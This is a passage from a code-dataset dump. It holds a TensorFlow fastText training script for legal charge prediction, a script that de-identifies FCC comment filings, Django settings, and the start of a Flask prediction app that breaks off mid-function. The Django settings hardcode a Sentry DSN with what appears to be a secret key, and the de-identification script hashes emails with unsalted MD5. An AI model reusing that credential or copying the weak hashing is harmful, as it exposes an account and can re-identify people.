format='%(asctime)s: %(levelname)s: %(message)s')\nlogging.root.setLevel(level=logging.INFO)\n\nflags = tf.flags\nflags.DEFINE_bool('is_retrain', False, 'if is_retrain is true, not rebuild the summary')\nflags.DEFINE_integer('max_epoch', 1, 'update the embedding after max_epoch, default: 1')\nflags.DEFINE_integer('max_max_epoch', 10, 'all training epoches, default: 6')\nflags.DEFINE_float('lr', 1e-3, 'initial learning rate, default: 1e-3')\nflags.DEFINE_float('decay_rate', 0.65, 'decay rate, default: 0.65')\nflags.DEFINE_float('keep_prob', 0.5, 'keep_prob for training, default: 0.5')\n# 正式\nflags.DEFINE_integer('decay_step', 8000, 'decay_step, default: 15000')\nflags.DEFINE_integer('valid_step', 6000, 'valid_step, default: 10000')\nflags.DEFINE_float('last_score', 0.5, 'if valid_score > last_score, save new model. default: 0.75')\n\n# 测试\n# flags.DEFINE_integer('decay_step', 1000, 'decay_step, default: 1000')\n# flags.DEFINE_integer('valid_step', 500, 'valid_step, default: 500')\n# flags.DEFINE_float('last_f1', 0.10, 'if valid_f1 > last_f1, save new model. default: 0.10')\nFLAGS = flags.FLAGS\n\nlr = FLAGS.lr\nlast_score = FLAGS.last_score\nsettings = Settings()\n# jieb = settings.jieba_len\nsummary_path = settings.summary_path\nckpt_path = settings.ckpt_path\nmodel_path = ckpt_path + 'model.ckpt'\n\nbatch_path = '../data/predictbatch/new1/fasttext/'\nembedding_path = '../data/word_embedding.npy'\nwords_path = '../data/sr_word2id.pkl'\n# data_train_path = '../data/jieba-data/data_train/batch/accu/'\n# data_valid_path = '../data/jieba-data/data_valid/batch/accu/'\ndata_train_path = '../data/new1/jieba-data/aug/data_train/batch/accu/'\ndata_valid_path = '../data/new1/jieba-data/data_test/batch/accu/'\n# data_valid_path = '../data/new1/jieba-data/aug/data_valid/batch/accu/'\n# data_train_path = '../data/new1/jieba-data/aug/data_train/batch/law/'\n# # data_valid_path = '../data/new1/jieba-data/data_test/batch/law/'\n# data_valid_path = '../data/new1/jieba-data/aug/data_valid/batch/law/'\ntr_batches = os.listdir(data_train_path) # batch 文件名列表\nva_batches = os.listdir(data_valid_path)\nn_tr_batches = len(tr_batches)\nn_va_batches = len(va_batches)\n\n\naccusation_path = '../cail_0518/accu.txt'\nlaw_path = '../cail_0518/law.txt'\njudger = Judger(accusation_path,law_path)\n\n# 测试\n# n_tr_batches = 1000\n# n_va_batches = 50\n\n\ndef get_batch_old(data_path, batch_id):\n \"\"\"get a batch from data_path\"\"\"\n new_batch = np.load(data_path + str(batch_id) + '.npz')\n X_batch = new_batch['X']\n y_batch = new_batch['y']\n X1_batch = X_batch[:, :1]\n X2_batch = X_batch[:, 1:]\n return [X1_batch, X2_batch, y_batch]\n\ndef get_batch(data_path, batch_id):\n \"\"\"get a batch from data_path\"\"\"\n new_batch = np.load(data_path + str(batch_id) + '.npz')\n X_batch = new_batch['X']\n y_batch = new_batch['y']\n return [X_batch, y_batch]\n\n\ndef valid_epoch(data_path, sess, model):\n \"\"\"Test on the valid data.\"\"\"\n va_batches = os.listdir(data_path)\n n_va_batches = len(va_batches)\n _costs = 0.0\n marked_labels_list = list()\n y_pred_list = list()\n# n_va_batches = 10\n for i in range(n_va_batches):\n [X_batch, y_batch1] = get_batch(data_path, i)\n marked_labels_list.extend(y_batch1)\n y_batch = to_categorical_accu(y_batch1)#罪名标签转换\n# y_batch = to_categorical_law(y_batch1) #法条标签转换\n# y_batch = to_categorical_time(y_batch1) #刑期标签转换\n _batch_size = len(y_batch)\n fetches = [model.loss, model.y_pred, model.accuracy]\n feed_dict = {model.X_inputs: X_batch, model.y_inputs: y_batch,\n model.batch_size: _batch_size, model.tst: True, model.keep_prob: 1.0}\n _cost, predict_labels, _accuracy = sess.run(fetches, feed_dict)\n y_pred_list.extend(predict_labels)\n# train_batch_predict(predict_labels,y_batch1, batch_path+'time/', i, batch_size=128)\n# train_batch_predict(predict_labels,y_batch1, batch_path+'law/', i, batch_size=128)\n train_batch_predict(predict_labels,y_batch1, batch_path+'accu/', i, batch_size=128)\n dictscore = {}\n maxscore = 0\n thresholdlist = [-0.80,-0.78,-0.76,0]\n for threshold in thresholdlist: \n predict_labels_list = list() # 所有的预测结果 \n for label in y_pred_list:\n xitem = np.argwhere(label>threshold).flatten()\n if(len(xitem)>0):\n predict_labels_list.append(xitem)\n else:\n predict_labels_list.append(label.argsort()[-1:-2:-1]) \n# print(len(predict_labels_list))\n# print(len(marked_labels_list))\n predict_label_and_marked_label_list = zip(predict_labels_list, marked_labels_list)\n score = judger.get_taskaccu_score(predict_label_and_marked_label_list) #罪名预测分数\n# score = judger.get_tasklaw_score(predict_label_and_marked_label_list) #法条预测分数\n# score = judger.get_tasktime_score(predict_label_and_marked_label_list) #刑期回归预测分数\n# score = judger.get_tasktime_class_score(predict_label_and_marked_label_list) #刑期分类预测分数\n dictscore[threshold] = score\n if(score > maxscore):\n maxscore = score\n# predict_labels_list.extend(list(predict_labels.flatten())) #刑期回归预测\n# predict_labels = map(lambda label: label.argsort()[-1:-2:-1], predict_labels) #刑期分类预测\n# predict_labels_list.extend(predict_labels)\n mean_cost = _costs / n_va_batches\n return mean_cost, dictscore, maxscore\n\n\ndef train_epoch(data_path, sess, model, train_fetches, valid_fetches, train_writer, test_writer):\n global last_score\n global lr\n time0 = time.time()\n batch_indexs = np.random.permutation(n_tr_batches) # shuffle the training data\n for batch in tqdm(range(n_tr_batches)):\n global_step = sess.run(model.global_step)\n if 0 == (global_step + 1) % FLAGS.valid_step:\n valid_cost, dictscore, score = valid_epoch(data_valid_path, sess, model)\n print('\\n')\n print('Global_step=%d: valid cost=%g; score=%g, time=%g s' % (\n global_step, valid_cost, score, time.time() - time0))\n logging.info('Global_step=%d: valid cost=%g; score=%g, time=%g s' % (\n global_step, valid_cost, score, time.time() - time0))\n for threshold,thresholdscore in dictscore.items():\n print('threshold=%g: score=%g ' % (threshold, thresholdscore))\n logging.info('threshold=%g: score=%g ' % ( threshold, thresholdscore))\n time0 = time.time()\n if score > last_score:\n last_score = score\n saving_path = model.saver.save(sess, model_path, global_step+1)\n print('\\n')\n print('saved new model to %s ' % saving_path)\n logging.info('saved new model to %s ' % saving_path)\n # training\n batch_id = batch_indexs[batch]\n [X_batch, y_batch] = get_batch(data_train_path, batch_id)\n y_batch = to_categorical_accu(y_batch) #罪名标签转换\n# y_batch = to_categorical_law(y_batch) #法条标签转换\n# y_batch = to_categorical_time(y_batch) #刑期标签转换\n _batch_size = len(y_batch)\n feed_dict = {model.X_inputs: X_batch, model.y_inputs: y_batch,\n model.batch_size: _batch_size, model.tst: False, model.keep_prob: FLAGS.keep_prob}\n summary, _cost, _accuracy, _, _ = sess.run(train_fetches, feed_dict) # the cost is the mean cost of one batch\n time_str = datetime.datetime.now().isoformat()\n# print(\"{}: step {}, loss {:g}, acc {:g}\".format(time_str, global_step, _cost, _accuracy))\n if 0 == (global_step + 1) % 200:\n logging.info(\"{}: step {}, loss {:g}, acc {:g}\".format(time_str, global_step, _cost, _accuracy))\n # valid per 500 steps\n if 0 == (global_step + 1) % 500:\n train_writer.add_summary(summary, global_step)\n batch_id = np.random.randint(0, n_va_batches) # 随机选一个验证batch\n [X_batch, y_batch] = get_batch(data_valid_path, batch_id)\n y_batch = to_categorical_accu(y_batch) #罪名标签转换\n# y_batch = to_categorical_law(y_batch) #法条标签转换\n# y_batch = to_categorical_time(y_batch) #刑期标签转换\n _batch_size = len(y_batch)\n feed_dict = {model.X_inputs: X_batch, model.y_inputs: y_batch,\n model.batch_size: _batch_size, model.tst: True, model.keep_prob: 1.0}\n summary, _cost, _accuracy = sess.run(valid_fetches, feed_dict)\n time_str = datetime.datetime.now().isoformat()\n# print(\"valid: {}: step {}, loss {:g}, acc {:g}\".format(time_str, global_step, _cost, _accuracy))\n logging.info(\"valid: {}: step {}, loss {:g}, acc {:g}\".format(time_str, global_step, _cost, _accuracy))\n test_writer.add_summary(summary, global_step)\n\n\ndef main(_):\n global ckpt_path\n global last_score\n if not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\n if not os.path.exists(summary_path):\n os.makedirs(summary_path)\n elif not FLAGS.is_retrain: # 重新训练本模型,删除以前的 summary\n shutil.rmtree(summary_path)\n os.makedirs(summary_path)\n if not os.path.exists(summary_path):\n os.makedirs(summary_path)\n\n print('1.Loading data...')\n logging.info('1.Loading data...')\n W_embedding = np.load(embedding_path)\n print('training sample_num = %d' % n_tr_batches)\n logging.info('training sample_num = %d' % n_tr_batches)\n print('valid sample_num = %d' % n_va_batches)\n logging.info('valid sample_num = %d' % n_va_batches)\n\n # Initial or restore the model\n print('2.Building model...')\n logging.info('2.Building model...')\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n model = Fasttext(W_embedding, settings)\n logging.info('word embedding path %s'%embedding_path)\n logging.info('text length = %d'%settings.jieba_len)\n logging.info('text length = %d'%settings.thulac_len)\n logging.info('train task class = %d'%settings.n_class)\n logging.info('model name %s'%settings.model_name)\n# logging.info('filter size = %s'%str(settings.filter_sizes))\n# logging.info('per filter size = %d'%settings.n_filter)\n with tf.variable_scope('training_ops') as vs:\n learning_rate = tf.train.exponential_decay(FLAGS.lr, model.global_step, FLAGS.decay_step,\n FLAGS.decay_rate, staircase=True)\n # two optimizer: op1, update embedding; op2, do not update embedding.\n with tf.variable_scope('Optimizer1'):\n tvars1 = tf.trainable_variables()\n grads1 = tf.gradients(model.loss, tvars1)\n optimizer1 = tf.train.AdamOptimizer(learning_rate=learning_rate)\n train_op1 = optimizer1.apply_gradients(zip(grads1, tvars1),\n global_step=model.global_step)\n with tf.variable_scope('Optimizer2'):\n tvars2 = [tvar for tvar in tvars1 if 'embedding' not in tvar.name]\n grads2 = tf.gradients(model.loss, tvars2)\n optimizer2 = tf.train.AdamOptimizer(learning_rate=learning_rate)\n train_op2 = optimizer2.apply_gradients(zip(grads2, tvars2),\n global_step=model.global_step)\n update_op = tf.group(*model.update_emas)\n merged = tf.summary.merge_all() # summary\n train_writer = tf.summary.FileWriter(summary_path + 'train', sess.graph)\n test_writer = tf.summary.FileWriter(summary_path + 'test')\n training_ops = [v for v in tf.global_variables() if v.name.startswith(vs.name+'/')]\n\n # 如果已经保存过模型,导入上次的模型\n if os.path.exists(ckpt_path + \"checkpoint\"):\n print(\"Restoring Variables from Checkpoint...\")\n logging.info(\"Restoring Variables from Checkpoint...\")\n model.saver.restore(sess, tf.train.latest_checkpoint(ckpt_path))\n valid_cost, dictscore, score = valid_epoch(data_valid_path, sess, model)\n print('Global_step=%d: valid cost=%g; score=%g' % (\n sess.run(model.global_step), valid_cost,score))\n logging.info('Global_step=%d: valid cost=%g; score=%g' % (\n sess.run(model.global_step), valid_cost, score))\n for threshold,thresholdscore in dictscore.items():\n print('threshold=%g: score=%g ' % (threshold, thresholdscore))\n logging.info('threshold=%g: score=%g ' % ( threshold, thresholdscore))\n sess.run(tf.variables_initializer(training_ops))\n train_op2 = train_op1\n else:\n print('Initializing Variables...')\n logging.info('Initializing Variables...')\n sess.run(tf.global_variables_initializer())\n\n print('3.Begin training...')\n logging.info('3.Begin training...')\n print('max_epoch=%d, max_max_epoch=%d' % (FLAGS.max_epoch, FLAGS.max_max_epoch))\n logging.info('max_epoch=%d, max_max_epoch=%d' % (FLAGS.max_epoch, FLAGS.max_max_epoch))\n train_op = train_op2\n for epoch in range(FLAGS.max_max_epoch):\n global_step = sess.run(model.global_step)\n print('Global step %d, lr=%g' % (global_step, sess.run(learning_rate)))\n logging.info('Global step %d, lr=%g' % (global_step, sess.run(learning_rate)))\n if epoch == FLAGS.max_epoch: # update the embedding\n train_op = train_op1\n\n train_fetches = [merged, model.loss, model.accuracy, train_op, update_op]\n valid_fetches = [merged, model.loss, model.accuracy]\n train_epoch(data_train_path, sess, model, train_fetches, valid_fetches, train_writer, test_writer)\n # 最后再做一次验证\n valid_cost, dictscore, score = valid_epoch(data_valid_path, sess, model)\n print('Global_step=%d: valid cost=%g; score=%g' % (\n sess.run(model.global_step), valid_cost,score))\n logging.info('Global_step=%d: valid cost=%g; score=%g' % (\n sess.run(model.global_step), valid_cost, score))\n for threshold,thresholdscore in dictscore.items():\n print('threshold=%g: score=%g ' % (threshold, thresholdscore))\n logging.info('threshold=%g: score=%g ' % ( threshold, thresholdscore))\n if score > last_score: # save the better model\n saving_path = model.saver.save(sess, model_path, sess.run(model.global_step)+1)\n print('saved new model to %s ' % saving_path)\n logging.info('saved new model to %s ' % saving_path)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"src/nju/fasttext/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":15926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"273438798","text":"#!/usr/bin/python3\n#\n# Author: Steve Landherr <landherr@cs.wisc.edu>\n#\n# Script to remove personally identifiable information (pii) from\n# comment submissions to FCC proceedings 17-108.\n#\n# JSON submission files are expected to be found under\n# ./FCC-SPAM-ECFS/ECFS_17-108_*/*.json\n#\n# Deidentified files are stored under ./deidentified, skipping any files\n# that already exist to permit restarting the script after interruption.\n\nimport glob\nimport hashlib\nimport json\nimport os\nimport sys\n\n\ndef usage():\n sys.stderr.write(\"usage: deidentify.py\")\n sys.exit(0)\n\n\ndef validate(key, value):\n \"\"\"\n Validate a particular element in the JSON data using custom code.\n Raises ValueError when validation fails.\n\n :param key: key of item being validated\n :param value: value found in submission\n :return: None\n \"\"\"\n if key == 'proceedings':\n if value == '17-108' or isinstance(value, list) and any([proceeding['name'] == '17-108'\n for proceeding in value]):\n return\n raise ValueError('invalid \"{}\": \"{}\"'.format(key, str(value)))\n\n\ndef sha256hash(key, value):\n \"\"\"\n Replace a particular element in the JSON data with the SHA256 hexdigest.\n\n :param key: key of the item being hashed\n :param value: value found in the submission\n :return: hexdigest of hashed value\n \"\"\"\n if not isinstance(value, str):\n raise ValueError('invalid \"{}\": \"{}\"'.format(key, str(value)))\n if not value:\n return value\n return hashlib.sha256(value.encode('ascii', 'xmlcharrefreplace')).hexdigest()\n\n\ndef md5hash(key, value):\n \"\"\"\n Replace a particular element in the JSON data with the MD5 hexdigest\n\n :param key: key of the item being hashed\n :param value: value found in the submission\n :return: hexdigest of hashed value\n \"\"\"\n if not isinstance(value, str):\n raise ValueError('invalid \"{}\": \"{}\"'.format(key, str(value)))\n if not value:\n return value\n return hashlib.md5(value.encode('ascii', 'xmlcharrefreplace')).hexdigest()\n\n\n# Dict of submission items containing PII in the following format:\n# 'item_key': [is_required, None | deidentify_method | nested_items_dict, alternate_item]\ndeidentify_items = {\n 'addressentity': [True, {\n 'address_line_1': [False, sha256hash],\n 'address_line_2': [False, sha256hash],\n 'address_line_3': [False, sha256hash],\n 'contact_email': [False, md5hash]\n }, 'internationaladdressentity'],\n 'filers': [True, None],\n 'proceedings': [True, validate],\n 'text_data': [False, None],\n 'text_data_docs': [False, None],\n 'internationaladdressentity': [False, {\n 'addresstext': [False, sha256hash]\n }],\n 'contact_email': [False, md5hash]\n}\n\n\ndef deidentify(comment, attributes=None):\n if attributes is None:\n attributes = deidentify_items\n for key, value in attributes.items():\n if key in comment:\n value = value[1]\n if value is None:\n del comment[key]\n elif isinstance(value, dict):\n if not isinstance(comment[key], dict):\n raise ValueError('invalid \"{}\": \"{}\"'.format(key, str(value)))\n deidentify(comment[key], attributes=value)\n elif isinstance(value, str):\n comment[key] = value\n else:\n comment[key] = value(key, comment[key])\n elif value[0]:\n if len(value) != 3 or value[2] not in comment:\n raise ValueError('missing \"{}\": {}'.format(key, json.dumps(comment, indent=4)))\n\n\nif __name__ == '__main__':\n print('starting...')\n outfile = sys.stdout\n for src_path in glob.glob('./FCC-SPAM-ECFS/ECFS_17-108_*/*.json'):\n with open(src_path) as src_file:\n sys.stdout.write(os.path.basename(src_path))\n dst_path = os.path.join('.', 'deidentified', os.path.basename(src_path))\n if os.path.exists(dst_path):\n sys.stdout.write(' [skipped]\\n')\n continue\n with open(dst_path, 'w') as dst_file:\n outfile = dst_file\n outfile.write('[\\n')\n separator = ''\n for i, comment in enumerate(json.load(src_file)):\n if i % 100 == 0:\n sys.stdout.write('.')\n sys.stdout.flush()\n try:\n deidentify(comment)\n outfile.write(separator + json.dumps(comment, indent=4))\n separator = ',\\n'\n except Exception as exc:\n sys.stderr.write('{}: {}\\n'.format(comment['id_submission'], exc))\n outfile.write('\\n]\\n')\n sys.stdout.write(' [done]\\n')\n","sub_path":"scripts/deidentify.py","file_name":"deidentify.py","file_ext":"py","file_size_in_byte":4835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"386604219","text":"# Django settings for qsic3 project.\nimport os\n\nimport dj_database_url\nfrom easy_thumbnails.conf import Settings as thumbnail_settings\n\n\ndef get_env_var(env_var, default=None, isbool=False):\n \"\"\"\n Return value of envirnoment variable or throw exception\n \"\"\"\n from django.core.exceptions import ImproperlyConfigured\n try:\n env_value = os.environ.get(env_var, default)\n if isbool:\n env_value = 'true' in str(env_value).lower().strip()\n return env_value\n except KeyError:\n error_msg = '{} environment variable not set'.format(env_var)\n raise ImproperlyConfigured(error_msg)\n\n# Return directory name containing file depth levels deep\ndirname = lambda file, depth: os.path.dirname(dirname(file, depth-1)) if depth else file\nPROJECT_ROOT = os.path.abspath(dirname(__file__, 3))\nrootjoin = lambda *args: os.path.join(PROJECT_ROOT, *args)\n\nDEBUG = get_env_var('DJANGO_DEBUG', default=False, isbool=True)\nTEMPLATE_DEBUG = DEBUG\nTHUMBNAIL_DEBUG = DEBUG\n\nDATABASE_URL = get_env_var('DATABASE_URL')\nDATABASES = {\n 'default': dj_database_url.config()\n}\n\n# Hosts/domain names that are valid for this site; required if DEBUG is False\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\nALLOWED_HOSTS = ['*']\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# In a Windows environment this must be set to your system time zone.\nTIME_ZONE = 'America/New_York'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-i\n# dentifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale.\nUSE_L10N = True\n\n# If you set this to False, Django will not use timezone-aware datetimes.\nUSE_TZ = True\n\n# Filesystem directory names for static and media files\nSTATIC_DIR = 'static'\nMEDIA_DIR = 'media'\n\n# AWS file access info\nAWS_ACCESS_KEY_ID = get_env_var('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = get_env_var('AWS_SECRET_ACCESS_KEY')\nAWS_STORAGE_BUCKET_NAME = get_env_var('AWS_STORAGE_BUCKET_NAME')\n\n# Of the format: '//bucket_name.s3.amazonaws.com/[media|static]/'\nAWS_S3_BUCKET_URL = '//%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME\n\n# Encoding for AWS transactions\nENCODING = 'utf-8'\n\n# Serve static from AWS\n# tell django to use django-storages\nSTATICFILES_STORAGE = 'django_py3s3.storages.S3StaticStorage'\nSTATIC_ROOT = AWS_S3_BUCKET_URL + '/' + STATIC_DIR + '/'\nSTATIC_URL = STATIC_ROOT\n\n# Serve media from AWS\nMEDIA_ROOT = AWS_S3_BUCKET_URL + '/' + MEDIA_DIR + '/'\nMEDIA_URL = MEDIA_ROOT\nDEFAULT_FILE_STORAGE = 'django_py3s3.storages.S3MediaStorage'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n rootjoin('static'),\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n # 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'project_settings.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'project_settings.wsgi.application'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n rootjoin('templates'),\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n # Uncomment the next line to enable the admin:\n 'django.contrib.admin',\n # Uncomment the next line to enable admin documentation:\n # 'django.contrib.admindocs',\n 'django_extensions',\n 'easy_thumbnails',\n 'image_cropping',\n 'core',\n 'events',\n 'groups',\n 'performers',\n 'py3s3',\n 'raven.contrib.django.raven_compat',\n)\n\nSESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = get_env_var('DJANGO_SECRET_KEY')\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d '\n '%(thread)d %(message)s'\n },\n\n 'medium': {\n 'format': '%(levelname)s %(asctime)s %(message)s'\n },\n\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'medium'\n }\n },\n\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n\n '': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n }\n}\n\n\n# easy_thumbnails and django image cropping\nTHUMBNAIL_PROCESSORS = (\n 'image_cropping.thumbnail_processors.crop_corners',\n) + thumbnail_settings.THUMBNAIL_PROCESSORS\n\n#THUMBNAIL_DEFAULT_STORAGE = 'easy_thumbnails.storage.ThumbnailFileSystemStorage'\nTHUMBNAIL_DEFAULT_STORAGE = DEFAULT_FILE_STORAGE\n\nIMAGE_CROPPING_SIZE_WARNING = True\n\nSOUTH_MIGRATION_MODULES = {\n 'easy_thumbnails': 'easy_thumbnails.south_migrations',\n}\n\n# Set your DSN value\nRAVEN_CONFIG = {\n 'dsn': 'https://e92ff3ac19cd4d89945f1b5e428f061d:accc3dfff4044ffa9193e79a564c9175@app.getsentry.com/34299',\n}","sub_path":"project_settings/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"311034107","text":"from flask import Blueprint, request, jsonify\nfrom meuBarFavorito.infraestructure.DbAccess import commit, salvar, deletar, abortComErro\nfrom meuBarFavorito.infraestructure.DbAccess import getEstabelecimento, getEvento, getEventoPorPartida, getFoto, getListaDeFotosDoEstabelecimento, getPartida\nfrom meuBarFavorito.models.Evento import Evento\nfrom meuBarFavorito.models.Partida import Partida\nfrom meuBarFavorito.models.Estabelecimento import Estabelecimento\nfrom meuBarFavorito.models.Foto import Foto\nfrom meuBarFavorito.app import db\nfrom meuBarFavorito.views.login import token_required\n\nbpevento = Blueprint('bpevento', __name__)\n\n@bpevento.route('/evento', methods=['POST'])\n@token_required\ndef postEvento(estabelecimentoAtual):\n data = request.get_json()\n\n idEstabelecimento = estabelecimentoAtual.id\n\n verificarEventoRepetido(idEstabelecimento, data['idPartida'])\n \n cadastrarEvento(\n idEstabelecimento = idEstabelecimento, \n idPartida = data['idPartida'], \n horaInicio = data['horaInicio'], \n horaFim = data['horaFim'], \n descricao = data['descricao']\n )\n\n return jsonify({'code': 200, 'body': {'mensagem': 'Evento cadastrado com sucesso!'}}), 200\n\n@bpevento.route('/evento', methods=['GET'])\ndef getEventos():\n eventos = Evento.query.all()\n\n eventosCompletos = []\n for evento in eventos:\n partida = getPartida(evento.idPartida)\n estabelecimento = getEstabelecimento(evento.idEstabelecimento)\n fotoPerfil = getFoto(estabelecimento.fotoPerfil)\n\n eventoAtual = {}\n eventoAtual['id'] = evento.id\n eventoAtual['nomeEstabelecimento'] = estabelecimento.nome\n eventoAtual['enderecoEstabelecimento'] = estabelecimento.endereco\n eventoAtual['fotoPerfil'] = fotoPerfil.midia\n eventoAtual['nomeMandante'] = partida.nomeMandante\n eventoAtual['escudoMandante'] = partida.escudoMandante\n eventoAtual['nomeVisitante'] = partida.nomeVisitante\n eventoAtual['escudoVisitante'] = partida.escudoVisitante\n eventoAtual['data'] = partida.dataHora\n eventoAtual['campeonato'] = partida.campeonato\n eventoAtual['estadio'] = partida.estadio\n\n eventosCompletos.append(eventoAtual)\n\n return jsonify(eventosCompletos)\n\n@bpevento.route('/evento/<int:id>', methods=['GET'])\ndef getOneEvento(id):\n evento = getEvento(id)\n partida = getPartida(evento.idPartida)\n estabelecimento = getEstabelecimento(evento.idEstabelecimento)\n fotoPerfil = getFoto(estabelecimento.fotoPerfil)\n\n eventoAtual = {}\n eventoAtual['id'] = evento.id\n eventoAtual['visualizacoes'] = evento.visualizacoes\n\n evento.visualizacoes += 1\n db.session.commit()\n\n eventoAtual['nomeEstabelecimento'] = estabelecimento.nome\n eventoAtual['descricaoEstabelecimento'] = estabelecimento.descricao\n eventoAtual['email'] = estabelecimento.email\n eventoAtual['telefone'] = estabelecimento.telefone\n eventoAtual['celular'] = estabelecimento.celular\n eventoAtual['enderecoEstabelecimento'] = estabelecimento.endereco\n eventoAtual['fotoPerfil'] = fotoPerfil.midia\n eventoAtual['cep'] = estabelecimento.cep\n\n fotos = getListaDeFotosDoEstabelecimento(estabelecimento.id)\n\n fotosEvento = []\n for foto in fotos:\n fotosEvento.append(foto.midia)\n \n eventoAtual['fotosEstabelecimento'] = fotosEvento\n\n eventoAtual['nomeMandante'] = partida.nomeMandante\n eventoAtual['escudoMandante'] = partida.escudoMandante\n eventoAtual['nomeVisitante'] = partida.nomeVisitante\n eventoAtual['escudoVisitante'] = partida.escudoVisitante\n eventoAtual['estadio'] = partida.estadio\n eventoAtual['data'] = partida.dataHora\n eventoAtual['campeonato'] = partida.campeonato\n\n return jsonify(eventoAtual)\n\n@bpevento.route('/partida/<int:id>/evento', methods=['GET'])\ndef getEventosPorPartida(id):\n partida = getPartida(id)\n eventos = getEventoPorPartida(partida.id)\n\n eventosCompletos = []\n for evento in eventos:\n estabelecimento = getEstabelecimento(evento.idEstabelecimento)\n fotoPerfil = getFoto(estabelecimento.fotoPerfil)\n\n eventoAtual = {}\n eventoAtual['id'] = evento.id\n eventoAtual['nomeEstabelecimento'] = estabelecimento.nome\n eventoAtual['enderecoEstabelecimento'] = estabelecimento.endereco\n eventoAtual['fotoPerfil'] = fotoPerfil.midia\n eventoAtual['nomeMandante'] = partida.nomeMandante\n eventoAtual['escudoMandante'] = partida.escudoMandante\n eventoAtual['nomeVisitante'] = partida.nomeVisitante\n eventoAtual['escudoVisitante'] = partida.escudoVisitante\n eventoAtual['data'] = partida.dataHora\n eventoAtual['campeonato'] = partida.campeonato\n eventoAtual['estadio'] = partida.estadio\n\n eventosCompletos.append(eventoAtual)\n\n return jsonify(eventosCompletos)\n\ndef cadastrarEvento(idEstabelecimento, idPartida, horaInicio, horaFim, descricao):\n novoEvento = Evento(idEstabelecimento, idPartida, horaInicio, horaFim, descricao)\n salvar(novoEvento)\n\n return novoEvento\n\ndef verificarEventoRepetido(idEstabelecimento, idPartida):\n checkEventos = Evento.query.filter_by(idEstabelecimento = idEstabelecimento, idPartida = idPartida).first()\n\n if checkEventos is not None:\n abortComErro({'code': 409, 'body': {'mensagem': 'Você já possui um evento desta partida!'}}, 409)","sub_path":"meuBarFavorito/views/cevento.py","file_name":"cevento.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"449411525","text":"from flask import Flask, jsonify, render_template, request\nimport time\nimport numpy as np\nimport json\nimport pandas as pd\nimport pickle\nimport numpy as np\n\napp = Flask(__name__)\n\n# load the model from disk\nfilename = 'workspace/finalized_model.sav'\nloaded_model = pickle.load(open(filename, 'rb'))\n\ndef convertPreChord(p):\n if p[0] == 'C' or p[0] == 'c':\n return 1\n elif p[0] == 'D' or p[0] == 'd':\n return 2\n elif p[0] == 'E' or p[0] == 'e':\n return 3\n elif p[0] == 'F' or p[0] == 'f':\n return 4\n elif p[0] == 'G' or p[0] == 'g':\n return 5\n elif p[0] == 'A' or p[0] == 'a':\n return 6\n elif p[0] == 'B' or p[0] == 'b':\n return 7\n else:\n return 